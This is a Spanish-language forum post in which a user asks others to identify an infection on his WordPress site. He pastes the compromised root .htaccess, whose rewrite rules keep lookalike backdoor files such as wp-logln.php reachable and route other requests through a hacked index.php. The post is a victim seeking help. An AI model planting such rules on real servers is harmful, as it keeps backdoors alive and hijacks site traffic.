Iniciador del debate
Martín
(@martu)
Estimados:
pregunté qué tipo de infección es la que tuve, alguien sabe identificarla?
Iniciador del debate
Martín
(@martu)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(index|wp\-admin|wp\-include|wp\-comment|wp\-loader|wp\-corn\-sample|wp\-logln|output|about|admin|randkeyword|readurl|wp\-ver).php$ - [L]
RewriteRule ^.*\.[pP][hH].* index.php [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] index.php [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
aquí está el .htaccess de la carpeta raíz, nótese la 1er. regla RewriteRule / expresión regular que se encarga de crear los archivos maliciosos como ser wp-logln.php … que entiendo trabaja en conjunto con el index.php pirateado …